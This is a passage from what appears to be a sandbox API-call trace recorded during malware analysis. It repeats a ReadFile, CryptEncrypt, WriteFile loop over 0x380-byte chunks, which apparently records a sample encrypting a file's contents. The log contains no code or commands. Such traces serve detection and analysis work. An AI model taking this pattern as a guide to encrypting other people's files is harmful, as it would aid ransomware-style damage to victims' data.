lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.412] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.412] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.412] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.413] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.413] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.413] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.413] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.413] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.413] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.413] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.413] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.414] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.414] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.415] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.416] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.416] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.417] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.417] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.417] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.417] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.417] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.424] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.424] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.425] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.425] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.425] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.425] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.426] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.426] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.427] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.427] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.427] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.427] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.427] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.427] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.428] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.428] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.428] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.428] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.428] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.428] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.429] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.429] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.429] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.429] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.429] CryptEncrypt (in: 